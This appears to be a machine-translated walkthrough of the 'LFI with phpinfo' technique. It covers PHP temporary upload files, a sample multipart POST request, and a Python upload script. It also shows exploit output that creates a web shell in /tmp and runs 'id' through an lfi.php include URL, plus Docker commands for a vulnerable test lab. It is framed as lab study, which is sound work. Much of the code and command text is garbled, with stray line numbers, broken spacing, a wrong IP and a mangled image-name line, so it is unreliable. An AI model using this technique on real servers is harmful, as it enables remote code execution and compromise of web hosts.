PHP local File Inclusion Vulnerability environment setup and exploitation Analysis

PHP local File Inclusion Vulnerability environment setup and exploitation Analysis
0x00 Introduction

Php local files contain vulnerability-related knowledge. On wooyun, there was a related article. lfi with phpinfo was first proposed by Daniel abroad. You can refer to the following two articles. The principle of exploits is to use php post to upload files to generate temporary files. phpinfo () reads the path and name of the temporary files. A backdoor is generated by a local vulnerability.

This method is successfully tested locally. To facilitate learning and reduce learning costs, you have built a docker environment for easy testing. Place the built docker on a foreign VPS and use the script in the poc folder of the github project lfi_phpinfo to run locally. You can still use getshell. This method is feasible and does not have high network requirements.

Docker Hub image address: janes/lfi_phpinfo

Github Project address: lfi_phpinfo

The source code is stored in the code directory and can be reproduced using docker. The poc directory stores scripts.

Paper:

Http://gynvael.coldwind.pl/download.php? F=PHP_LFI_rfc1867_temporary_files.pdf

Http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf

0x01 php Upload

A temporary file is generated when a post request is sent to any PHP file on the server. You can find the path and name of the temporary file on the phpinfo page.

Post Upload File

When uploading any file in php post mode, the server will create a temporary file to save the file content.

In order to facilitate file transfer, a form-based HTML file transfer method is defined in the HTTP protocol.

To ensure that the attribute of the upload form is enctype = "multipart/form-data, you must use POST. See: php file-upload.post-method

The PHP engine processes requests such as enctype = "multipart/form-data" as follows:

When a request arrives to create a temporary file and write the content of the uploaded file, call the corresponding PHP script for processing, such as verifying the name and size of the temporary file, and delete it.

The PHP engine first saves the file content to a temporary file and then performs the corresponding operations. The temporary file name is a php + random character.

$ _ FILES information, including the temporary file path and name

In PHP, there is a super global variable $ _ FILES to save the information of the uploaded file, including the file name, type, temporary file name, error code, size

0x02 Manually test phpinfo () to obtain the temporary file path Html form

File upload.html

1 2 3 4 5 6 7 8 9 10 11

Access upload.html in the browser and upload the file file.txt.

1 2 3

The following figure shows the POST information of the burp.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 19 20 21 22 23 24 POST/LFI_phpinfo/phpinfo. php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv: 44.0) Gecko/20100101 Firefox/44.0 Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8 Accept-Language: en-US, en; q = 0.5 Accept-Encoding: gzip, deflate Referer: http: // 127.0.0.1/LFI_phpinfo/upload.html Connection: close Content-Type: multipart/form-data; boundary = ------------------------- 11008921013555437861019615112 Content-Length: 368 limit 11008921013555437861019615112 Content-Disposition: form-data; name = "file"; filename = "file.txt" Content-Type: text/plain ----------------------------- 11008921013555437861019615112 Content-Disposition: form-data; name = "submit" Submit ----------------------------- 11008921013555437861019615112 --

For browser access, phpinfo returns the following information:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 _ REQUEST ["submit"] Submit _ POST ["submit"] Submit _ FILES ["file"] Array ([name] => file.txt [type] => text/plain [tmp_name] =>/tmp/phpufdCHh [error] => 0 [size] => 33)

 

Obtain the tmp_name path.

0x03 python script upload file 1 2 3 4 5 6 7 8 9 import requests host = '2017. 0.0.1 'url = 'HTTP: // {ip}/LFI_phpinfo/phpinfo. php '. format (ip = host) file _ = '/var/www/LFI_phpinfo/file.txt' response = requests. post (url, files = {"name": open (file _, 'rb')}) print (response. text)

Partial return results

1 2 3 4 5 6 7 8_ FILES ["name"]

Array ([name] => file.txt [type] => [tmp_name] =>/tmp/php7EvBv3 [error] => 0 [size] => 33) 0x04 local Build Environment

Get shell

1 2 3 4 5 6 7 8 9 10 $ python lfi_phpinfo.py 127.0.0.1 LFI with phpinfo () ============================== INFO :__ main __: getting initial offset... INFO :__ main __: found [tmp_name] at 67801 INFO :__ main __: Got it! Shell created in/tmp/g INFO :__ main __: Wowo! \ M/INFO :__ main __: Shutting down...

Firefox access

1 2 3 http: // 127.0.0.1/LFI_phpinfo/lfi. php? Load =/tmp/gc & f = id uid = 33 (www-data) gid = 33 (www-data) groups = 33 (www-data)

It indicates that getshell is successful and can be used freely later ~~

0x05 use docker to build the environment

The basic usage of docker is not described here. You can google it on your own. Here we provide two ways to build an image source: Use Dockerfile in github lfi_phpinfo to build it on your own, or use the image janes/lfi_phpinfo that I have built.

Image Source

-- [Php 1 = "" 2 = "2 =" 2 = "2 =" 2 = "2 =" 2 = "language = ": 5.6-apache "\"] [/php]/php5

Or

-- Janes/lfi_phpinfo

Build Environment run test

Obtain the source code of github lfi_phpinfo, switch to the web directory, and start building the environment for testing. Three running methods are provided here.

Method 1 run the test using php official source

1 docker run -- rm-v code/:/var/www/html-p 80: 80 php: 5.6-apache

Method 2 run the test using the built image janes/lfi_phpinfo

1 2 docker pull "janes/lfi_phpinfo" docker run -- rm-p "80: 80" janes/lfi_phpinfo

Method 3 Use docker-compose

1 docker-compose up

 

Next, you can use the python script getshell.

1 python lfi_phpinfo.py docker_host_ip 0x06 conclusion

The process of using LFI with PHPInfo is not as smooth as the process of reading the article. During this period, you may encounter some environment-related problems, and it will take effort to solve these problems, this is the source that gave rise to my idea of using docker to build a test environment, hoping to provide a more convenient learning environment for those who love network security. Finally, I would like to thank the author of the article [LFI with PHPInfo local test process] for providing me with a lot of help in studying LFI with phpinfo.